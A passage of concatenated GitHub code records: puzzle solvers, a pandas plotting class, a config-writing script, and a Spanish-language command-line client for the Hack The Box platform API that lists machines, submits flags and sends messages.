bliz_data.items():\r\n if bliz == '>':\r\n bliz_data[bliz] = [(r, c + 1) if c != max_c else (r, 1) for r, c in bliz_pos]\r\n if bliz == 'v':\r\n bliz_data[bliz] = [(r + 1, c) if r != max_r else (1, c) for r, c in bliz_pos]\r\n if bliz == '<':\r\n bliz_data[bliz] = [(r, c - 1) if c != 1 else (r, max_c) for r, c in bliz_pos]\r\n if bliz == '^':\r\n bliz_data[bliz] = [(r - 1, c) if r != 1 else (max_r, c) for r, c in bliz_pos]\r\n new_bliz_pos = bliz_data['>'] + bliz_data['v'] + bliz_data['<'] + bliz_data['^']\r\n for p_r, p_c in pos:\r\n next_pos = [\r\n (p_r - 1, p_c),\r\n (p_r + 1, p_c),\r\n (p_r, p_c - 1),\r\n (p_r, p_c + 1),\r\n (p_r, p_c)\r\n ]\r\n for pos_r, pos_c in next_pos:\r\n if 1 <= pos_r <= max_r and 1 <= pos_c <= max_c or (pos_r, pos_c) in [src, des]:\r\n if (pos_r, pos_c) not in new_bliz_pos + new_pos:\r\n new_pos.append((pos_r, pos_c))\r\n i += 1\r\n pos = new_pos\r\n return i\r\n\r\n\r\ndef part_1(input_string):\r\n map_input = list(map(list, input_string.split('\\n')[:-1]))\r\n bliz_data = parse_bliz_data(map_input)\r\n max_r = len(map_input) - 2\r\n max_c = len(map_input[0]) - 2\r\n src = (0, map_input[0].index('.'))\r\n des = (len(map_input) - 1, map_input[-1].index('.'))\r\n print(move(src, des, bliz_data, max_r, max_c))\r\n\r\n\r\ndef part_2(input_string):\r\n map_input = list(map(list, input_string.split('\\n')[:-1]))\r\n bliz_data = parse_bliz_data(map_input)\r\n max_r = len(map_input) - 2\r\n max_c = len(map_input[0]) - 2\r\n src = (0, map_input[0].index('.'))\r\n des = (len(map_input) - 1, map_input[-1].index('.'))\r\n i = move(src, des, bliz_data, max_r, max_c) + move(des, src, bliz_data, max_r, max_c) + move(src, des, bliz_data, max_r, max_c)\r\n print(i)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--part\",\r\n help=\"Specify puzzle 1 or puzzle 2 to be solved. 
Run both by default.\",\r\n required=False)\r\n args = parser.parse_args()\r\n file_input = open('Input_24.txt', 'r')\r\n input_string = file_input.read()\r\n file_input.close()\r\n\r\n if args.part == '1':\r\n part_1(input_string)\r\n elif args.part == '2':\r\n part_2(input_string)\r\n else:\r\n part_1(input_string)\r\n part_2(input_string)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"DSW41923/AoC_DSW41923","sub_path":"2022/Day_24.py","file_name":"Day_24.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29874272606","text":"\n\n# ==============================\n# MCAR adhoc tests vs MNAR, MAR\n# ==============================\n\n# ======\n# Plots\n# ======\n\nimport ED\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.impute import SimpleImputer\nfrom scipy.stats import chi2_contingency\nfrom sklearn.preprocessing import OrdinalEncoder\nimport numpy as np\nimport logging\n\n# ---------------------------------------------------------Charts Class-----------------------------------------------------\n\n\nclass Charts(Base):\n\n\tdef Categorical_missingness_Crosstab_Plot(independent, target):\n\t \n\t '''Plot cross tab'''\n\t \n\t missingness = independent.isnull()\n\t cross_tab = pd.crosstab(target, missingness, normalize=\"columns\", dropna=True).apply(lambda r: round(r,2), axis=1)\n\n\t ax = cross_tab.plot(kind='bar', width=0.15, ylabel=\"Number Absorbed\",color=[\"#003A5D\",\"#A19958\"]\\\n\t ,edgecolor=\"tab:grey\",linewidth=1.5)\n\n\t l = {\"Not-Absorbed\":\"#003A5D\", \"Absorbed\":\"#A19958\"}\n\t labels = list(l.keys())\n\t handles = [plt.Rectangle((5,5),10,10, color=l[label]) for label in labels]\n\t plt.legend(handles, labels, fontsize=7, bbox_to_anchor=(1.13,1.17), loc=\"upper left\", title=\"legend\",shadow=True)\n\n\t plt.title(\"Number Absorbed for each Gender\", fontsize=9, pad=12)\n\t plt.xlabel(\"Gender\",fontsize=7.5)\n\t plt.xticks(fontsize=7.5)\n\t plt.ylabel('Number Absorbed', fontsize = 7.5)\n\t plt.yticks(fontsize=7.5)\n\t plt.rcParams[\"figure.figsize\"] = (2.7,2.5)\n\t plt.rcParams[\"legend.title_fontsize\"] = 7\n\n\t for pos in [\"right\", \"top\"]:\n\t plt.gca().spines[pos].set_visible(False)\n\t \n\t for c in ax.containers:\n\t ax.bar_label(c, label_type='edge', fontsize=7)\n\t \n\t return cross_tab\n\n\n\tdef Categorical_missingness_Pivot_Plot(independent, target):\n\t \n\t '''Categorical Plot for greater than 2 categories'''\n\t \n\t missingness = independent.isnull()\n\t df = pd.concat([missingness, target], axis=1) \n\t df_pivot = pd.pivot_table(df, index=independent.name, values=target.name, aggfunc=len, fill_value=0)\\\n\t #.apply(lambda x: x/float(x.sum()))\n\n\t d = df_pivot.plot(kind=\"bar\", width=0.1, color=[\"#003A5D\",\"#A19958\"], fontsize=7.5\\\n\t , edgecolor=\"tab:grey\",linewidth=1.5)\n\n\t d.legend(title=\"legend\", bbox_to_anchor=(1, 1.02), loc='upper left', fontsize=6.5, shadow=True)\n\t \n\t plt.title(\"Race and Absorption for Gender\", fontsize=7.5, pad=12)\n\t plt.xlabel('Absorbed', fontsize=7)\n\t plt.xticks(fontsize=7)\n\t plt.ylabel('Number Absorbed', fontsize = 7)\n\t plt.yticks(fontsize=7)\n\t plt.xlabel(\" \")\n\t plt.rcParams[\"figure.figsize\"] = (2.7,2.5)\n\t plt.rcParams[\"legend.title_fontsize\"] = 7\n\n\t for pos in [\"right\", \"top\"]:\n\t plt.gca().spines[pos].set_visible(False)\n\n\n\t return df_pivot\n\n\n\tdef Categorical_Crosstab_Plot(independent, target):\n\t \n\t ''' Plot 
cross tab '''\n\n\t h = pd.crosstab(target,independent, normalize=\"columns\")\n\t bar = plt.bar(target, independent)\n\t return plt.show(), h\n\n\n\tdef Categorical_Pivot_Plot(independent, target):\n\t \n\t '''Categorical Plot for greater than 2 categories'''\n\t \n\t df = pd.concat([independent, target], axis=1) \n\t df_pivot = pd.pivot_table(df, index=independent.name, columns=target.name, aggfunc=len, fill_value=0)\\\n\t .apply(lambda x: x/float(x.sum()))\n\t \n\t return df_pivot.plot(kind=\"bar\"), df_pivot\n\n\n\tdef Scatter_Plot(independent, target):\n\t \n\t '''Scatter plot between numerical variables'''\n\t \n\t scatter = plt.scatter(target, independent)\n\t return plt.show() \n\n\tdef Correlation_Plot(dataframe):\n\t \n\t '''Independent variables correlation plot'''\n\n\t return dataframe.corr()\n\n\tdef Point_Biserial_Plot(independent, target):\n\t \n\t sns.set_theme(style=\"ticks\", color_codes = True)\n\t data = pd.concat([independent, target], axis=1)\n\t \n\t return sns.catplot(x = independent, y = target, kind=\"box\", data = data) ","repo_name":"Humbulani1234/Streamlit","sub_path":"class_plotting.py","file_name":"class_plotting.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1226856840","text":"import sys\r\n\r\nn, m, *ab = map(int, sys.stdin.read().split())\r\ngraph = [[] for _ in range(n)]\r\nfor a, b in zip(*[iter(ab)] * 2):\r\n a -= 1\r\n b -= 1\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n\r\n\r\ndef main():\r\n stack = [(0, 0)]\r\n paths = 0\r\n while stack:\r\n i, visited = stack.pop()\r\n visited |= 1 << i\r\n if visited == (1 << n) - 1:\r\n paths += 1\r\n continue\r\n for j in graph[i]:\r\n if visited >> j & 1:\r\n continue\r\n stack.append((j, visited))\r\n print(paths)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/abc054/abc054_c/11884904.py","file_name":"11884904.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"37106840709","text":"import configparser\nimport os\n\nclass Config(object):\n def __init__(self, config_file='config.ini'):\n self.config_file = config_file\n self.config = configparser.ConfigParser()\n try:\n self.config.read(config_file)\n except Exception as e:\n err = 'config file is corrupted.\\n{0}'.format(e)\n raise SystemExit(err)\n\n def set(self, section, option, envvar):\n if os.getenv(envvar):\n if section != 'DEFAULT' and not self.config.has_section(section):\n self.config.add_section(section)\n self.config.set(section, option, os.getenv(envvar))\n\n def stor(self):\n try:\n with open(self.config_file, 'w') as configfile:\n self.config.write(configfile)\n except Exception as e:\n err = 'cannot write in config file.\\n{0}'.format(e)\n raise SystemExit(err)\n\nif __name__ == '__main__':\n config = Config('/var/lib/supysonic/.supysonic')\n config.set('base', 'database_uri', 'SUPYSONIC_DB_URI')\n config.set('base', 'scanner_extensions', 'SUPYSONIC_SCANNER_EXTENSIONS')\n config.set('base', 'secret_key', 'SUPYSONIC_SECRET_KEY')\n config.set('webapp', 'cache_dir', 'SUPYSONIC_WEBAPP_CACHE_DIR')\n config.set('webapp', 'log_file', 'SUPYSONIC_WEBAPP_LOG_FILE')\n config.set('webapp', 'log_level', 'SUPYSONIC_WEBAPP_LOG_LEVEL')\n config.set('daemon', 'socket', 'SUPYSONIC_DAEMON_SOCKET')\n config.set('daemon', 'log_file', 'SUPYSONIC_DAEMON_LOG_FILE')\n 
config.set('daemon', 'log_level', 'SUPYSONIC_DAEMON_LOG_LEVEL')\n config.set('lastfm', 'api_key', 'SUPYSONIC_LASTFM_API_KEY')\n config.set('lastfm', 'secret', 'SUPYSONIC_LASTFM_SECRET')\n config.stor()\n","repo_name":"ogarcia/docker-supysonic","sub_path":".circleci/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"15711320452","text":"#!/usr/bin/python3\n#coding:utf-8\n\n#Autor: xaxxjs (https://sergioab7.github.io/index.html)\n\n#Thanks to (sw1tch-bl4d3) (https://gitlab.com/sw1tchbl4d3) for the API\n\nfrom bs4 import BeautifulSoup\n\nfrom challenges import challenges\nfrom machines import machines\nfrom social import social\n\nimport re\n\nfrom htbapi.core import getRequest, rawPostSSL\n\n\nfrom beautifultable import BeautifulTable\nfrom colorama import Fore, Back, Style\nimport signal\nfrom time import sleep\nimport signal\nimport json\nimport warnings\nimport os, sys\nwarnings.filterwarnings(\"ignore\")\n\ndef signal_handler(key,frame):\n print(Fore.YELLOW + \"\\n[*]\" + Fore.RESET + \"[!] Saliendo... \\n\")\n print(Style.RESET_ALL)\n sys.exit(1)\n\nsignal=signal.signal(signal.SIGINT,signal_handler)\n\n\nbanner=Fore.GREEN + \"\"\"\n __ __ __ __ __ \n / /_ ____ _ __/ /_/ /_ ___ / /_ ____ ______/ /__\n / __ \\/ __ \\| |/_/ __/ __ \\/ _ \\/ __ \\/ __ `/ ___/ //_/\n / /_/ / /_/ /> >\" + Fore.RESET)\n while(len(comando)<50):\n comando=input(Fore.BLUE + \"INSERTA TU API>>\" + Fore.RESET)\n print(Fore.YELLOW + \"\\n\\t\\t[API AGREGADA CON ÉXITO]\" + Fore.RESET)\n print(Fore.YELLOW + \"\\n\\t\\tReinicia el servicio para que se apliquen los cambios\\n\\n\" + Fore.RESET)\n f.write(comando)\n f.close()\n sys.exit()\n\nif(os.path.isfile(\"api.txt\")):\n with open(\"api.txt\", \"r\") as app:\n API = app.read()\n app.close()\nelse:\n api()\n\nos.system(\"clear\")\nprint(banner)\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\ndef comandos_general():\n print(\"\"\"\n \"\"\"+ bcolors.FAIL +\"[+]\"+bcolors.ENDC + \"\"\" Maquina\n \"\"\"+ bcolors.FAIL +\"[+]\"+bcolors.ENDC + \"\"\" Social\n \"\"\"+ bcolors.FAIL +\"[+]\"+bcolors.ENDC + \"\"\" Challenges\n\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Clear \n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Exit \n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Help\n \"\"\")\n\ncomandos_general()\n\n\n\ndef comandos_maquina():\n print(\"\"\"\n \"\"\"+ bcolors.HEADER +\"\\n\\t\\t[INFORMACIÓN]\" + bcolors.ENDC + \"\"\" \n \"\"\"+ bcolors.FAIL +\"[1]\"+bcolors.ENDC + \"\"\" Mostrar todas las máquinas. 
\n \"\"\"+ bcolors.FAIL +\"[2]\"+bcolors.ENDC + \"\"\" Mostrar todas las máquinas activas.\n \"\"\"+ bcolors.FAIL +\"[3]\"+bcolors.ENDC + \"\"\" Mostrar todas las máquinas retiradas.\n \"\"\"+ bcolors.HEADER +\"\\n\\t\\t[INTERACCIÓN]\" + bcolors.ENDC + \"\"\" \n \"\"\"+ bcolors.FAIL +\"[4]\"+bcolors.ENDC + \"\"\" Inserta la flag (user/root).\n \"\"\"+ bcolors.FAIL +\"[5]\"+bcolors.ENDC + \"\"\" Resetea la máquina.\n \"\"\"+ bcolors.FAIL +\"[6]\"+bcolors.ENDC + \"\"\" Asigna una máquina.\n \"\"\"+ bcolors.FAIL +\"[7]\"+bcolors.ENDC + \"\"\" Extiende el tiempo de la máquina.\n \"\"\"+ bcolors.FAIL +\"[8]\"+bcolors.ENDC + \"\"\" Para la máquina.\n\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Back\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Clear \n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Help\n \"\"\")\n\ndef mostrar_todas_las_maquinas():\n try:\n table=BeautifulTable()\n table.set_style(BeautifulTable.STYLE_GRID)\n test=table.columns.header=[Fore.CYAN+\"MÁQUINA\"+Fore.RESET,Fore.CYAN+\"S.O\"+Fore.RESET,Fore.CYAN+\"IP\"+Fore.RESET,Fore.CYAN+\"Puntos\"+Fore.RESET,Fore.CYAN+\"USER OWN\"+Fore.RESET,Fore.CYAN+\"ROOT OWN\"+Fore.RESET,Fore.CYAN+\"RATING\"+Fore.RESET,Fore.CYAN+\"BY\"+Fore.RESET]\n for i in machines.getAllMachines(API):\n table.append_row([f\"{i['name']}\", f\"{i['os']}\", f\"{i['ip']}\", f\"{i['points']}\", f\"{i['user_owns']}\", f\"{i['root_owns']}\", f\"{i['rating']}\", f\"{i['maker']['name']}\"])\n for i in test:\n table.left_padding_widths[i]=1\n table.right_padding_widths[i]=1\n print(table)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef mostrando_maquinas_activas():\n try:\n activemachines = []\n allmachines = machines.getAllMachines(API)\n for machine in allmachines:\n if machine[\"retired\"] == False:\n activemachines.append(machine)\n table=BeautifulTable()\n table.set_style(BeautifulTable.STYLE_GRID)\n test=table.columns.header=[Fore.CYAN+\"MÁQUINA\"+Fore.RESET,Fore.CYAN+\"S.O\"+Fore.RESET,Fore.CYAN+\"IP\"+Fore.RESET,Fore.CYAN+\"Puntos\"+Fore.RESET,Fore.CYAN+\"USER OWN\"+Fore.RESET,Fore.CYAN+\"ROOT OWN\"+Fore.RESET,Fore.CYAN+\"RATING\"+Fore.RESET,Fore.CYAN+\"BY\"+Fore.RESET]\n for i in activemachines:\n table.append_row([f\"{i['name']}\", f\"{i['os']}\", f\"{i['ip']}\", f\"{i['points']}\", f\"{i['user_owns']}\", f\"{i['root_owns']}\", f\"{i['rating']}\", f\"{i['maker']['name']}\"])\n for i in test:\n table.left_padding_widths[i]=1\n table.right_padding_widths[i]=1\n print(table)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n \n\ndef mostrando_maquinas_retiradas():\n try:\n retiredmachines = []\n allmachines = machines.getAllMachines(API)\n for machine in allmachines:\n if machine[\"retired\"] == True:\n retiredmachines.append(machine)\n table=BeautifulTable()\n table.set_style(BeautifulTable.STYLE_GRID)\n test=table.columns.header=[Fore.CYAN+\"MÁQUINA\"+Fore.RESET,Fore.CYAN+\"S.O\"+Fore.RESET,Fore.CYAN+\"IP\"+Fore.RESET,Fore.CYAN+\"Puntos\"+Fore.RESET,Fore.CYAN+\"USER OWN\"+Fore.RESET,Fore.CYAN+\"ROOT OWN\"+Fore.RESET,Fore.CYAN+\"RATING\"+Fore.RESET,Fore.CYAN+\"BY\"+Fore.RESET]\n for i in retiredmachines:\n table.append_row([f\"{i['name']}\", f\"{i['os']}\", f\"{i['ip']}\", f\"{i['points']}\", f\"{i['user_owns']}\", f\"{i['root_owns']}\", f\"{i['rating']}\", f\"{i['maker']['name']}\"])\n for i in test:\n table.left_padding_widths[i]=1\n table.right_padding_widths[i]=1\n print(table)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef 
conversor_id(maquina):\n try:\n maquina = maquina.lower()\n maquina = maquina.capitalize()\n maquina_id=\"\"\n for i in machines.getAllMachines(API):\n if(i['name']==maquina):\n maquina_id = i['id']\n return maquina_id\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef inserta_flag(maquina_htb):\n try:\n machine_id=conversor_id(maquina_htb)\n flag=input(Fore.YELLOW + \"\\t[+]\"+ Fore.RESET + \"Inserta la flag(user/root) >>\")\n dificultad=int(input(Fore.YELLOW + \"\\t[+]\"+Fore.RESET + \"Inserta la dificultad (1-10) >>\"))\n resultado=machines.ownMachine(machine_id, API, flag,dificultad)\n if(resultado==\"success\"):\n print(Fore.GREEN + \"\\n\\t[+] SUCCESS!\" +Fore.RESET)\n elif(resultado==\"flag_invalid\"):\n print(Fore.RED + \"\\n\\t[+] FLAG INVÁLIDA\" +Fore.RESET)\n elif(resultado==\"failed\"):\n print(Fore.RED + \"\\n\\t[+] SUCCESS! \" +Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef resetea_maquina(maquina_htb):\n try:\n machine_id=conversor_id(maquina_htb)\n resultado=machines.resetMachine(machine_id, API)\n print(Fore.GREEN + \"[+] Máquina reseteada con éxito.\"+Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n \ndef asignar_maquina(maquina_htb):\n try:\n machine_id=conversor_id(maquina_htb)\n resultado=machines.assignMachine(machine_id, API)\n if(resultado==\"success\"):\n print(Fore.GREEN + \"\\n\\t[+] MAQUINA ASIGNADA!\" +Fore.RESET)\n elif(resultado==\"already_have_machiine\"):\n print(Fore.RED + \"\\n\\t[+] YA TIENES LA MAQUINA EN USO!\" +Fore.RESET)\n elif(resultado==\"no_vip\"):\n print(Fore.RED + \"\\n\\t[+] MAQUINA INCORRECTA!\" +Fore.RESET)\n elif(resultado==\"failed\"):\n print(Fore.GREEN + \"\\n\\t[+] MAQUINA ASIGNADA!\" +Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef parar_maquina(maquina_htb):\n machine_id=conversor_id(maquina_htb)\n response=machines.stopMachine(machine_id,API)\n print(Fore.GREEN + \"\\n\\t[+] SUCCESS!\" +Fore.RESET)\n\ndef extender_tiempo_maquina(maquina_htb):\n machine_id=conversor_id(maquina_htb)\n response=machines.extendMachine(machine_id, API)\n print(Fore.GREEN + \"\\n\\t[+] SUCCESS!\" +Fore.RESET)\n\n\n\n\ndef maquina():\n comandos_maquina()\n while True:\n try:\n comando=input(bcolors.UNDERLINE + \"boxthehack\" + bcolors.ENDC + \"/(MAQUINA)> \")\n comando=comando.lower()\n if(comando==\"help\"):\n comandos_maquina()\n elif(comando==\"back\"):\n break\n elif(comando==\"1\"):\n print(\"[+]Mostrando todas las máquinas...\")\n sleep(1)\n mostrar_todas_las_maquinas()\n elif(comando==\"2\"):\n print(\"[+]Mostrando todas las máquinas activas...\")\n sleep(1)\n mostrando_maquinas_activas()\n elif(comando==\"3\"):\n print(\"[+]Mostrando todas las máquinas retiradas...\")\n sleep(1)\n mostrando_maquinas_retiradas()\n elif(comando==\"4\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" INSERTA FLAG\")\n sleep(0.5)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n inserta_flag(nombre_maquina)\n elif(comando==\"5\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" RESETEA MAQUINA\")\n sleep(1)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n resetea_maquina(nombre_maquina)\n elif(comando==\"6\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" ASIGNAR MAQUINA\")\n sleep(1)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n 
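# asignar_maquina resolves the machine name to its HTB id and requests the assignment\n                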
asignar_maquina(nombre_maquina)\n elif(comando==\"7\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" EXTIENDE EL TIEMPO DE LA MAQUINA\")\n sleep(1)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n extender_tiempo_maquina(nombre_maquina)\n elif(comando==\"8\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" PARAR MAQUINA\")\n sleep(1)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n parar_maquina(nombre_maquina)\n elif(comando==\"clear\"):\n os.system(\"clear\")\n print(banner)\n else:\n print(Fore.RED + \"[-] \" +Fore.RESET + \"Error, no existe el comando\")\n except Exception as e:\n print(\"Error: %s\"%(e))\n\ndef comandos_social():\n print(\"\"\"\n \"\"\"+ bcolors.HEADER +\"\\n\\t\\t[INFORMACIÓN]\" + bcolors.ENDC + \"\"\" \n \"\"\"+ bcolors.FAIL +\"[1]\"+bcolors.ENDC + \"\"\" Mostrar último mensaje de la ShoutBox. \n \"\"\"+ bcolors.FAIL +\"[2]\"+bcolors.ENDC + \"\"\" Mostrar todas tus conversaciones.\n \"\"\"+ bcolors.HEADER +\"\\n\\t\\t[INTERACCIÓN]\" + bcolors.ENDC + \"\"\" \n \"\"\"+ bcolors.FAIL +\"[3]\"+bcolors.ENDC + \"\"\" Enviar mensaje a la ShoutBox.\n \"\"\"+ bcolors.FAIL +\"[4]\"+bcolors.ENDC + \"\"\" Inicia conversación con un destinatario.\n \"\"\"+ bcolors.FAIL +\"[5]\"+bcolors.ENDC + \"\"\" Envía mensaje a una conversación ya iniciada.\n\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Back\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Clear \n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Help\n \"\"\")\n\ndef mostrar_ultimo_mensaje():\n try:\n response = rawPostSSL(f\"/shouts/get/initial/html/1\", \"\", API, \"\", \"}\").decode()\n if '\"success\":\"0\"' in response:\n return \"failed\"\n response = response[response.find('{\"success\":\"1\"'):]\n bs=BeautifulSoup(response, \"lxml\")\n ref=bs.find_all('a')\n span=bs.find_all('span')\n for r in ref:\n print(r.contents[0])\n \n for i in span:\n print(i.contents[0])\n\n\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef todas_conversaciones():\n try:\n response = rawPostSSL(\"/conversations/list/\", \"\", API, \"\", '\"}]').decode()\n response = response[response.find('[{\"id\":'):]\n jsondata = json.loads(response)\n for i in jsondata:\n print(Fore.YELLOW+\"\\n\\t\\t%s: %s -> %s\"%(i['id'],i['usernames'], i['lastmessage'])+Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef enviar_mensaje_shout():\n try:\n msg=input(\"\\n\\t[+] Escribe el mensaje que quieras enviar >>\")\n response = rawPostSSL(\"/shouts/new/\", f\"text={msg}\", API, \"x-www-form-urlencoded\", \"\")\n print(Fore.GREEN + \"[+] Mensaje enviado\" + Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef inicia_conversacion(destinatario):\n try:\n msg=input(\"\\n\\t[+] Escribe el mensaje que quieras enviar >>\")\n response = rawPostSSL(\"/conversations/new/\", f\"recipients%5B%5D={destinatario}&message={msg}\", API, \"x-www-form-urlencoded\", \"\")\n print(Fore.GREEN + \"[+] Mensaje enviado\" + Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef conversacion_iniciada():\n try:\n response = rawPostSSL(\"/conversations/list/\", \"\", API, \"\", '\"}]').decode()\n response = response[response.find('[{\"id\":'):]\n jsondata = json.loads(response)\n for i in jsondata:\n print(Fore.YELLOW+\"\\n\\t\\t%s: %s -> %s\"%(i['id'],i['usernames'], i['lastmessage'])+Fore.RESET)\n\n 
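# prompt for the conversation id listed above, then send the message to that conversation\n        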
conversationid=int(input(\"\\n\\t[+]Ingresa el 'ID' del usuario>> \"))\n msg=input(\"\\n\\t[+] Escribe el mensaje que quieras enviar >>\")\n \n response = rawPostSSL(f\"/conversations/send/{conversationid}/\", f\"id={conversationid}&message={msg}\", API, \"x-www-form-urlencoded\", \"\")\n print(Fore.GREEN + \"[+] Mensaje enviado\" + Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\n\ndef social():\n comandos_social()\n while True:\n try:\n comando=input(bcolors.UNDERLINE + \"boxthehack\" + bcolors.ENDC + \"/(SOCIAL)> \")\n comando=comando.lower()\n if(comando==\"help\"):\n comandos_social()\n elif(comando==\"back\"):\n break\n elif(comando==\"1\"):\n print(\"[+] Mostrando ultimo mensaje..\")\n sleep(1.5)\n mostrar_ultimo_mensaje()\n elif(comando==\"2\"):\n print(\"[+] Mostrando todas las conversaciones..\")\n sleep(1.5)\n todas_conversaciones()\n elif(comando==\"3\"):\n enviar_mensaje_shout()\n elif(comando==\"4\"):\n destinatario=input(Fore.YELLOW + \"\\t[+]\"+ Fore.RESET + \" Introduce destinatario>>\")\n inicia_conversacion(destinatario)\n elif(comando==\"5\"):\n conversacion_iniciada()\n elif(comando==\"clear\"):\n os.system(\"clear\")\n print(banner)\n else:\n print(Fore.RED + \"[-] \" +Fore.RESET + \"Error, no existe el comando\")\n except Exception as e:\n print(\"Error: %s\"%(e))\n\n\ndef comandos_challenge():\n print(\"\"\"\n \"\"\"+ bcolors.FAIL +\"[1]\"+bcolors.ENDC + \"\"\" Flag del challenge [NO OPERATIVO]. \n\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Back\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Clear\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Help\n \"\"\")\n\ndef comprobar_flag(flag):\n try:\n #MODIFICAR\n #MODIFICAR\n #MODIFICAR\n response = rawPostSSL(\"/challenges/own/\", f'challenge_id={challengeid}&flag={flag}&difficulty={difficulty * 10}', API, \"x-www-form-urlencoded\", \"\")\n if '\"success\":\"1\"'.encode() in response:\n return \"success\"\n elif \"Incorrect flag\".encode() in response:\n return \"flag_invalid\"\n else:\n return \"failed\"\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef challenges():\n comandos_challenge()\n while True:\n try:\n comando=input(bcolors.UNDERLINE + \"boxthehack\" + bcolors.ENDC + \"/(CHALLENGES)> \")\n comando=comando.lower()\n if(comando==\"1\"):\n #flag=input(\"[+] Introduce la FLAG >>\")\n break\n elif(comando==\"back\"):\n break \n elif(comando==\"clear\"):\n os.system(\"clear\")\n print(banner)\n elif(comando==\"help\"):\n comandos_challenge()\n else:\n print(Fore.RED + \"[-] \" +Fore.RESET + \"Error, no existe el comando\")\n except Exception as e:\n print(\"Error: %s\"%(e))\n\n\n\nwhile True:\n comando=input(bcolors.UNDERLINE + \"boxthehack\" + bcolors.ENDC + \" > \")\n comando=comando.lower()\n try:\n if(comando==\"maquina\"):\n maquina()\n elif(comando==\"social\"):\n social()\n elif(comando==\"challenges\"):\n challenges()\n elif(comando==\"help\"):\n comandos_general()\n elif(comando==\"clear\"):\n os.system(\"clear\")\n print(banner)\n elif(comando==\"exit\"):\n sys.exit(1)\n else:\n print(Fore.RED + \"[-] \" +Fore.RESET + \"Error, no existe el comando\")\n except Exception as e:\n print(\"Error: %s\"%(e))\n","repo_name":"sergioab7/boxthehack","sub_path":"boxthehack.py","file_name":"boxthehack.py","file_ext":"py","file_size_in_byte":18285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"31008271692","text":"import logging\nlogger = 
